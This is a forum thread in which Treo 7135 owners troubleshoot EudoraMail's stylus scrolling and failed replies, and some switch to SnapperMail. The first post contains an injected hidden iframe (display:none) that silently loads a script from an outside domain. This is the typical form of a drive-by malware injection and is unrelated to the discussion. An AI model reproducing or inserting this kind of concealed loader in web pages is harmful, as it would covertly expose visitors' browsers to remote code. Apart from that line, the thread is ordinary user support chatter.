+ Reply to Thread

Two observations about EudoraMail on my 7135

First of all, is it just me, or does the scroll bar on the main screen of EudoraMail not work with a stylus. I can only go up or down with the up/down hard buttons. The stylus scroll worked just fine on my 6035. It's not a big deal at all, because like I said you can just use the buttons, but I am just curious if it is just isolated to my phone or everybody's

Secondly,
    When I get an email from someone and I reply to it, when I try to send my reply, I get an incorrect address error. I think it is because there is usually a "<jj & jazz>" next to the actual JJandjazz@smartphonesource.com email address. I think it the part in the <> is confusing it. But I'm not sure.
    Do any of you know if there is an option to have the <>s not appear with the actual email addresses?

Incidentally that problem also existed at times on my 6035.

Since I can't seem to reply to emails (but I can send out original emails), I am thinking of just buying SnapperMail and not using EudoraMail at all.

Thoughts? Reactions? Observances?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ~'kito
    pdaPhoneHome Moderator

I'm not having these problems. Eudora Mail is one of the best built-ins on my 7135. The scroll bar works and I am able to both send and reply to mail. Do you have any interfering hacks or other system hooks?

I don't understand the <> problem.

I just downloaded SnapperMail... about time, eh?
    And I LOVE it.

Expensive, but really nice.
    ~'kito
    pdaPhoneHome Moderator

I can't get the scroll bar to work, but I can send and receive just fine.

NMgeek

Originally posted by NMgeek
    I can't get the scroll bar to work, but I can send and receive just fine.

NMgeek
    NMGeek,
    Did you also have a 6035?

I'm looking for commonalities. It appears that some of us who transitioned from certain Palm devices are having unique problems. Just removing the Saved_Preference file is not enough to give us clean start. Our previous Mail.DB and Network.DB files are not replaced.

It turns out that the second of the two problems is not due to Eudora, as I just installed SnapperMail (which I love) and it to can't do replies. Guess I have some outgoing settings to change in my email account.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I just downloaded SnapperMail... about time, eh?
    And I LOVE it.

Expensive, but really nice.
    That's good to hear! So... if you end up trying to attach any WordSmith files, let us know how it comes out?